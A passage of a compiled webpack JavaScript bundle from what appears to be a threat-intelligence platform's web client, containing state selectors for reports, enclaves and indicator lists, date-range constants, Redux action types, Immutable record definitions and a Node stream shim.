 * because it's possible for report information (such as metadata) to be fetched
 * first and merged into the store, but if that's the case it will not have the
 * full date so we make sure it has an id as an indicator that the data we want
 * is all there.
 */
var currentReportOrListItem = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([reports, reportList, currentReportId], function (reports, reportList, id) {
  var reportId = id && Array.isArray(id) ? id[0] : id;

  return reports.getIn([reportId, 'data', 'id']) // See NOTE
  ? reports.getIn([reportId, 'data']) : reportList.getIn([reportId, 'data']);
});

var reportOrListItem = function reportOrListItem(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([reports, reportList], function (reports, reportList) {
    return reports.getIn([id, 'data', 'id']) // See NOTE
    ? reports.getIn([id, 'data']) : reportList.getIn([id, 'data']);
  });
};

/* ID of first Reports List result, should be a traditional incident report
 * which includes correlations so it doesn't break the tour.
 *
 * NOTE: During app load there is no report metadata so we can't determine
 * a report with a positive correlation count. In this case, 'maybeReport'
 * below is undefined so here we just show the first search list result,
 * which may have no correlations.
 *
 */
var firstReportResultId = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([reportSeq], function (reportSeq) {
  if (!reportSeq.size) return null;
  var maybeReport = reportSeq.filter(function (r) {
    return r.has('reportGuid');
  }).find(function (r) {
    return r.get('correlationCount') > 0;
  });
  return maybeReport ? maybeReport.get('reportGuid') : reportSeq.toList().first().get('id');
});

/* ID of first Search List result, should be an 'indicator-based' report */
var firstSearchListResultId = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([reportList], function (reports) {
  if (!reports.size) return;
  return reports.first().get('id');
});

/* NOTE: on paginating graphs methods below:
 *
 * There is a lot of state that determines what "next" and "prev" mean in terms of a graph.
 *
 * A user can get to a graph from a deep link, the reports list, the indicators list, cases, dashboard,
 * or search results. For deep link, there is no context so next/prev is disabled. We currently
 * are not supporting next/prev iteration for dashboard and cases. For all the others, this
 * getter determines the ID of the next/prev item in the appropriate list.
 */

/* Index must not be -1 (not found) or first or last item in list */
var validIndex = function validIndex(idx) {
  return idx !== -1;
};
var validatePrev = function validatePrev(idx, max) {
  return validIndex(idx) && idx > 0;
};
var validateNext = function validateNext(idx, max) {
  return validIndex(idx) && idx < max - 1;
};

/* Finds index of item in iterable list with matching ID
* Note: Since we now are phasing out multi-enclave submissions, we will get search results
* with the same report for differnet enclaves -- aka duplicates, we need to skip those to avoid a loop.
* TODO: Deal with duplicates */
var getIdxInList = function getIdxInList(list, id) {
  var currentIndex = list.findIndex(function (r) {
    return r.get('guid') === id;
  });
  return currentIndex;
};

/* Determine previous graph ID for iterating to previous graph in analysis view, takes a parameter
 * to indicate pagination direction (-1 for previous, +1 for next) */
var paginateConstellationId = function paginateConstellationId(paginateDirection) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([entitiesSearchData, reportsSearchData, __WEBPACK_IMPORTED_MODULE_5_modules_app_getters__["userLastViewed"], reportList, __WEBPACK_IMPORTED_MODULE_6_modules_indicators_getters__["indicatorList"], currentReportId, __WEBPACK_IMPORTED_MODULE_5_modules_app_getters__["visitedExplore"], __WEBPACK_IMPORTED_MODULE_5_modules_app_getters__["lastRoute"]], function (entitiesSearch, reportsSearch, lastViewed, reports, indicators, currentId, visitedExplore, lastRoute) {

    var result = null;
    var currentIndex = void 0;
    var listContext = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])();
    var validateIndexInList = paginateDirection === 1 ? validateNext : validatePrev;
    var reportItems = reportsSearch.get('items', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])());
    var entityItems = entitiesSearch.get('items', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])());

    // Unsupported, short-circuit.
    if (!visitedExplore || lastRoute === '/dashboard' || lastRoute === '/browse/cases') {
      result = null;
    }

    // Handle search context: either reports or IOCs results
    else if (lastViewed === __WEBPACK_IMPORTED_MODULE_7_modules_app_constants__["LAST_VIEWED_SEARCH"]) {
        listContext = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(reportItems);
        currentIndex = getIdxInList(listContext, currentId);
        if (validateIndexInList(currentIndex, listContext.size)) {
          var id = listContext.get(currentIndex + paginateDirection).get('guid');
          result = lastViewed === __WEBPACK_IMPORTED_MODULE_7_modules_app_constants__["LAST_VIEWED_INDICATORS"] ? Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["encodeId"])(id) : id;
        } else {
          var iocList = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(entityItems);
          currentIndex = iocList.findIndex(function (ioc) {
            return ioc.get('guid') === currentId;
          });
          if (validateIndexInList(currentIndex, iocList.size)) {
            result = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["encodeId"])(iocList.get(currentIndex + paginateDirection).get('guid'));
          }
        }
      }

      // Handle reports list context
      else if (lastViewed === __WEBPACK_IMPORTED_MODULE_7_modules_app_constants__["LAST_VIEWED_REPORTS"]) {
          if (lastViewed === __WEBPACK_IMPORTED_MODULE_7_modules_app_constants__["LAST_VIEWED_REPORTS"]) {
            listContext = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(reportItems);
            currentIndex = getIdxInList(listContext, currentId);
            if (validateIndexInList(currentIndex, listContext.size)) {
              result = listContext.get(currentIndex + paginateDirection).get('guid');
            }
          }
        }

        // Handle IOCs list context
        else if (lastViewed === __WEBPACK_IMPORTED_MODULE_7_modules_app_constants__["LAST_VIEWED_INDICATORS"]) {
            if (lastViewed === __WEBPACK_IMPORTED_MODULE_7_modules_app_constants__["LAST_VIEWED_INDICATORS"]) {
              listContext = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(entityItems);
              currentIndex = getIdxInList(listContext, currentId);
              if (validateIndexInList(currentIndex, listContext.size)) {
                result = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["encodeId"])(listContext.get(currentIndex + paginateDirection).get('guid'));
              }
            }
          }

    return result;
  });
};

// Copy and Move Report Getters
var reportActionAsyncInProgress = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['reports', 'reportActionAsyncInProgress']);

/***/ }),
/* 216 */,
/* 217 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "colors", function() { return colors; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "displayOptions", function() { return displayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclave", function() { return enclave; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclavesMap", function() { return enclavesMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclaves", function() { return enclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "internalEnclaves", function() { return internalEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "internalEnclavesByTemplateName", function() { return internalEnclavesByTemplateName; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getPhishingTriageEnclaves", function() { return getPhishingTriageEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getInitialFormValues", function() { return getInitialFormValues; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp__ = __webpack_require__(123);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__types_js__ = __webpack_require__(99);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__templates_getters__ = __webpack_require__(683);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_triage_constants__ = __webpack_require__(570);









var colors = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['enclaves', 'colors']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['enclaves', 'loading']);
var displayOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['enclaves', 'options']);

/**
 * The primary enclave getter. This is computed rather than just a keypath so
 * that we can merge in persistent colors. This was part of the feature of
 * persisting colors so that they do not get reset on every browser refresh.
 *
 * NOTE: In the future this color should be persisted in the database so that
 * all users who have access to an enclave see the same color, as well as
 * sessions between browsers. It would also allows us to remove this bit of
 * complexity and return to a nice plain keypath getter.
 */
var _enclaves = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['enclaves', 'enclaves']);

var enclave = function enclave(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclavesMap, function (enclaves) {
    return enclaves.get(id);
  });
};

var enclavesMap = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([_enclaves, colors, displayOptions], function (enclaves, colors, options) {
  return enclaves.map(function (x) {
    return x.set('color', colors.get(x.id) || x.color);
  }).filter(function (enclave) {
    var query = options.get('query');
    var regex = new RegExp(__WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp___default()(query), 'i');
    // Test all top-level string values
    return enclave.toSeq().valueSeq().filter(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default.a).some(function (x) {
      return x.search(regex) > -1;
    });
  }).sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]);
});

var enclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclavesMap, function (enclaves) {
  return enclaves.toList();
});

var internalEnclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclaves, function (enclaves) {
  return enclaves.filter(function (enclave) {
    return enclave.get('label') === 'INTERNAL';
  });
});

// Having
var internalEnclavesByTemplateName = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(internalEnclaves, function (enclaves) {
  return enclaves.groupBy(function (enclave) {
    return enclave.get('templateName');
  });
});

var getPhishingTriageEnclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(internalEnclavesByTemplateName, function (enclavesByTemplateName) {
  return enclavesByTemplateName.get(__WEBPACK_IMPORTED_MODULE_7_modules_triage_constants__["b" /* PHISHING_TRIAGE_ENCLAVE_TEMPLATE_NAME */], Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])());
});

/*
 * Generate initial form values for adding/editing enclave.
 */
var getInitialFormValues = function getInitialFormValues(enclave) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(__WEBPACK_IMPORTED_MODULE_6__templates_getters__["templatesMap"], function (templates) {
    return !enclave ? Object(__WEBPACK_IMPORTED_MODULE_5__types_js__["h" /* _Enclave */])({}).toMap() : enclave;
  });
};

/***/ }),
/* 218 */,
/* 219 */,
/* 220 */,
/* 221 */,
/* 222 */,
/* 223 */,
/* 224 */,
/* 225 */,
/* 226 */,
/* 227 */,
/* 228 */,
/* 229 */,
/* 230 */,
/* 231 */,
/* 232 */,
/* 233 */,
/* 234 */,
/* 235 */,
/* 236 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
var NOW = new Date();

var LAST_HOUR = new Date();
LAST_HOUR.setHours(LAST_HOUR.getHours() - 1);

var LAST_TWELVE_HOURS = new Date();
LAST_TWELVE_HOURS.setHours(LAST_TWELVE_HOURS.getHours() - 12);

// One Day ago
var YESTERDAY = new Date();
YESTERDAY.setDate(YESTERDAY.getDate() - 1);

// 7 Days ago
var LAST_SEVEN_DAYS = new Date();
LAST_SEVEN_DAYS.setDate(LAST_SEVEN_DAYS.getDate() - 7);

// 14 Days ago
var LAST_FOURTEEN_DAYS = new Date();
LAST_FOURTEEN_DAYS.setDate(LAST_FOURTEEN_DAYS.getDate() - 14);

// Month ago
var LAST_MONTH = new Date();
LAST_MONTH.setMonth(LAST_MONTH.getMonth() - 1);

// Three Months Ago
var LAST_THREE_MONTHS = new Date();
LAST_THREE_MONTHS.setMonth(LAST_THREE_MONTHS.getMonth() - 3);

// Six Months Ago
var LAST_SIX_MONTHS = new Date();
LAST_SIX_MONTHS.setMonth(LAST_SIX_MONTHS.getMonth() - 6);

// A Year Ago
var LAST_YEAR = new Date();
LAST_YEAR.setFullYear(LAST_YEAR.getFullYear() - 1);

// Epoch 0 = Dec 1, 1969
var EPOCH_0 = new Date(0);

// -------------------------------\\
var DATE_PRESET_DEFAULTS = [{ from: YESTERDAY, to: NOW, label: '1D' }, { from: LAST_SEVEN_DAYS, to: NOW, label: '7D' }, { from: LAST_MONTH, to: NOW, label: '1M' }, { from: LAST_SIX_MONTHS, to: NOW, label: '6M' }, { from: EPOCH_0, to: NOW, label: 'Max' }];

/* harmony default export */ __webpack_exports__["a"] = ({
  NOW: NOW,
  LAST_HOUR: LAST_HOUR,
  LAST_TWELVE_HOURS: LAST_TWELVE_HOURS,
  YESTERDAY: YESTERDAY,
  LAST_SEVEN_DAYS: LAST_SEVEN_DAYS,
  LAST_MONTH: LAST_MONTH,
  LAST_THREE_MONTHS: LAST_THREE_MONTHS,
  LAST_SIX_MONTHS: LAST_SIX_MONTHS,
  LAST_YEAR: LAST_YEAR,
  EPOCH_0: EPOCH_0,
  LAST_FOURTEEN_DAYS: LAST_FOURTEEN_DAYS,
  DATE_PRESET_DEFAULTS: DATE_PRESET_DEFAULTS
});

/***/ }),
/* 237 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.

// a duplex stream is just a stream that is both readable and writable.
// Since JS doesn't have multiple prototypal inheritance, this class
// prototypally inherits from Readable, and then parasitically from
// Writable.



/*<replacement>*/

var pna = __webpack_require__(486);
/*</replacement>*/

/*<replacement>*/
var objectKeys = Object.keys || function (obj) {
  var keys = [];
  for (var key in obj) {
    keys.push(key);
  }return keys;
};
/*</replacement>*/

module.exports = Duplex;

/*<replacement>*/
var util = __webpack_require__(347);
util.inherits = __webpack_require__(348);
/*</replacement>*/

var Readable = __webpack_require__(1235);
var Writable = __webpack_require__(688);

util.inherits(Duplex, Readable);

{
  // avoid scope creep, the keys array can then be collected
  var keys = objectKeys(Writable.prototype);
  for (var v = 0; v < keys.length; v++) {
    var method = keys[v];
    if (!Duplex.prototype[method]) Duplex.prototype[method] = Writable.prototype[method];
  }
}

function Duplex(options) {
  if (!(this instanceof Duplex)) return new Duplex(options);

  Readable.call(this, options);
  Writable.call(this, options);

  if (options && options.readable === false) this.readable = false;

  if (options && options.writable === false) this.writable = false;

  this.allowHalfOpen = true;
  if (options && options.allowHalfOpen === false) this.allowHalfOpen = false;

  this.once('end', onend);
}

Object.defineProperty(Duplex.prototype, 'writableHighWaterMark', {
  // making it explicit this property is not enumerable
  // because otherwise some prototype manipulation in
  // userland will fail
  enumerable: false,
  get: function () {
    return this._writableState.highWaterMark;
  }
});

// the no-half-open enforcer
function onend() {
  // if we allow half-open state, or if the writable side ended,
  // then we're ok.
  if (this.allowHalfOpen || this._writableState.ended) return;

  // no more data can be written.
  // But allow more writes to happen in this tick.
  pna.nextTick(onEndNT, this);
}

function onEndNT(self) {
  self.end();
}

Object.defineProperty(Duplex.prototype, 'destroyed', {
  get: function () {
    if (this._readableState === undefined || this._writableState === undefined) {
      return false;
    }
    return this._readableState.destroyed && this._writableState.destroyed;
  },
  set: function (value) {
    // we ignore the value if the stream
    // has not been initialized yet
    if (this._readableState === undefined || this._writableState === undefined) {
      return;
    }

    // backward compatibility, the user is explicitly
    // managing destroyed
    this._readableState.destroyed = value;
    this._writableState.destroyed = value;
  }
});

Duplex.prototype._destroy = function (err, cb) {
  this.push(null);
  this.end();

  pna.nextTick(cb, err);
};

/***/ }),
/* 238 */,
/* 239 */,
/* 240 */,
/* 241 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return CLEAR_INDICATORS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DELETE_INDICATOR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return DELETE_INDICATOR_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "B", function() { return SET_TIME_RANGE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "C", function() { return SET_TIME_RANGE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "v", function() { return PAGINATE_INDICATOR_LIST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "w", function() { return REFRESH_INDICATOR_LIST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "D", function() { return STORE_INDICATOR_LOCAL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return FETCH_INDICATOR_LIBRARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return FETCH_INDICATOR_LIBRARY_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return FETCH_INDICATOR_LIBRARY_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "A", function() { return SET_INDICATOR_FETCH_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return FETCH_INDICATOR_METADATA; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "r", function() { return FETCH_INDICATOR_METADATA_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return FETCH_INDICATOR_METADATA_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return FETCH_INDICATORS_FOR_TAG; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return FETCH_INDICATORS_FOR_TAG_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return FETCH_INDICATORS_FOR_TAG_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "s", function() { return FETCH_IOC_ENRICHMENT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "u", function() { return FETCH_IOC_ENRICHMENT_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "t", function() { return FETCH_IOC_ENRICHMENT_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "x", function() { return REVERT_CLASSIFICATION; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "z", function() { return REVERT_CLASSIFICATION_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "y", function() { return REVERT_CLASSIFICATION_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return EXPORT_INDICATORS_LIST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return EXPORT_INDICATORS_LIST_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return EXPORT_INDICATORS_LIST_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return EXPORT_INDICATORS_FOR_TAG; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return EXPORT_INDICATORS_FOR_TAG_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return EXPORT_INDICATORS_FOR_TAG_FAILURE; });
var prefix = function prefix(str) {
  return 'station/cpe/' + str;
};

var CLEAR_INDICATORS = prefix('CLEAR_INDICATORS');

var DELETE_INDICATOR = prefix('DELETE_INDICATOR');
var DELETE_INDICATOR_FAILURE = prefix('DELETE_INDICATOR_FAILURE');

var SET_TIME_RANGE = prefix('SET_TIME_RANGE');
var SET_TIME_RANGE_SUCCESS = prefix('SET_TIME_RANGE_SUCCESS');

var PAGINATE_INDICATOR_LIST = prefix('PAGINATE_INDICATOR_LIST');
var REFRESH_INDICATOR_LIST = prefix('REFRESH_INDICATOR_LIST');
var STORE_INDICATOR_LOCAL = prefix('STORE_INDICATOR_LOCAL');

var FETCH_INDICATOR_LIBRARY = prefix('FETCH_INDICATOR_LIBRARY');
var FETCH_INDICATOR_LIBRARY_SUCCESS = prefix('FETCH_INDICATOR_LIBRARY_SUCCESS');
var FETCH_INDICATOR_LIBRARY_FAILURE = prefix('FETCH_INDICATOR_LIBRARY_FAILURE');

var SET_INDICATOR_FETCH_OPTIONS = prefix('SET_INDICATOR_FETCH_OPTIONS');

var FETCH_INDICATOR_METADATA = prefix('FETCH_INDICATOR_METADATA');
var FETCH_INDICATOR_METADATA_SUCCESS = prefix('FETCH_INDICATOR_METADATA_SUCCESS');
var FETCH_INDICATOR_METADATA_FAILURE = prefix('FETCH_INDICATOR_METADATA_FAILURE');

var FETCH_INDICATORS_FOR_TAG = prefix('FETCH_INDICATORS_FOR_TAG');
var FETCH_INDICATORS_FOR_TAG_SUCCESS = prefix('FETCH_INDICATORS_FOR_TAG_SUCCESS');
var FETCH_INDICATORS_FOR_TAG_FAILURE = prefix('FETCH_INDICATORS_FOR_TAG_FAILURE');

var FETCH_IOC_ENRICHMENT = prefix('FETCH_IOC_ENRICHMENT');
var FETCH_IOC_ENRICHMENT_SUCCESS = prefix('FETCH_IOC_ENRICHMENT_SUCCESS');
var FETCH_IOC_ENRICHMENT_FAILURE = prefix('FETCH_IOC_ENRICHMENT_FAILURE');

var REVERT_CLASSIFICATION = prefix('REVERT_CLASSIFICATION');
var REVERT_CLASSIFICATION_SUCCESS = prefix('REVERT_CLASSIFICATION_SUCCESS');
var REVERT_CLASSIFICATION_FAILURE = prefix('REVERT_CLASSIFICATION_FAILURE');

var EXPORT_INDICATORS_LIST = prefix('EXPORT_INDICATORS_LIST');
var EXPORT_INDICATORS_LIST_SUCCESS = prefix('EXPORT_INDICATORS_LIST_SUCCESS');
var EXPORT_INDICATORS_LIST_FAILURE = prefix('EXPORT_INDICATORS_LIST_FAILURE');

var EXPORT_INDICATORS_FOR_TAG = prefix('EXPORT_INDICATORS_FOR_TAG');
var EXPORT_INDICATORS_FOR_TAG_SUCCESS = prefix('EXPORT_INDICATORS_FOR_TAG_SUCCESS');
var EXPORT_INDICATORS_FOR_TAG_FAILURE = prefix('EXPORT_INDICATORS_FOR_TAG_FAILURE');

/***/ }),
/* 242 */,
/* 243 */,
/* 244 */,
/* 245 */,
/* 246 */,
/* 247 */,
/* 248 */,
/* 249 */,
/* 250 */,
/* 251 */,
/* 252 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return Quota; });
/* unused harmony export Sector */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return EnclavePermission; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Company; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return Options; });
/* unused harmony export getQuotaParams */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_modules_groups_types_js__ = __webpack_require__(355);






var Quota = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  guid: null,
  lastResetTime: null,
  maxRequests: 0,
  usedRequests: 0,
  windowSize: null // Null allows the server to use the default
});

// Raw from the server


var Sector = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  id: null,
  name: '',
  label: ''
});

var EnclavePermission = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  rowId: null,
  id: null,
  name: '',
  read: false,
  create: false,
  update: false,
  pattern: null
});

var Company = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  id: null, // Is a number, must be provided by server
  guid: '',
  maxUserCount: 5, // Should come from server
  userCount: 0,
  sector: null,
  city: '',
  name: '',
  zipCode: '',
  state: '',
  address: '',
  enclaves: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  sharingGroups: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  country: '',
  primaryEmail: '',
  created: null, // Timestamp
  maxIngestEmailsCount: 1,
  mfaActivated: false,
  ssoActivated: false,
  trialCompany: false,
  rateLimit: undefined,
  requestQuotas: undefined
});

// Support instantiation of sector record
Company.of = function (x) {
  x = Company(x);
  x = x.set('sector', Sector(x.sector));
  x = x.set('sharingGroups', x.sharingGroups.map(__WEBPACK_IMPORTED_MODULE_2_modules_groups_types_js__["SharingGroup"]));
  x = x.set('requestQuotas', x.requestQuotas ? x.requestQuotas.map(Quota) : undefined);
  return x;
};

var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  query: '',
  enclaveId: '',
  sortBy: 'name',
  sortOrder: 'ASC',
  pageNumber: 0,
  pageSize: 25,
  hasNext: true,
  empty: true,
  totalElements: 0,
  totalPages: 0,
  simpleFetch: false
});

var getQuotaParams = Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["pipe"])(Quota, Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["pick"])(['maxRequests', 'usedRequests', 'windowSize']));

/***/ }),
/* 253 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1414);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(557);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(3196);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(1416);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__constants__ = __webpack_require__(761);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "constants", function() { return __WEBPACK_IMPORTED_MODULE_4__constants__; });










/***/ }),
/* 254 */,
/* 255 */,
/* 256 */,
/* 257 */,
/* 258 */,
/* 259 */,
/* 260 */,
/* 261 */,
/* 262 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "KEY_PREFIX", function() { return KEY_PREFIX; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "REHYDRATE", function() { return REHYDRATE; });
var KEY_PREFIX = 'reduxPersist:';
var REHYDRATE = 'persist/REHYDRATE';

/***/ }),
/* 263 */,
/* 264 */,
/* 265 */,
/* 266 */,
/* 267 */,
/* 268 */,
/* 269 */,
/* 270 */,
/* 271 */,
/* 272 */,
/* 273 */,
/* 274 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";
/* WEBPACK VAR INJECTION */(function(global, process) {

function oldBrowser () {
  throw new Error('Secure random number generation is not supported by this browser.\nUse Chrome, Firefox or Internet Explorer 11')
}

